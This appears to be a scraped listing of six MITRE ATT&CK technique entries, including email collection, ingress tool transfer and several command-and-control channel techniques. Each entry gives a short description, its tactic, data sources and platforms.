Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre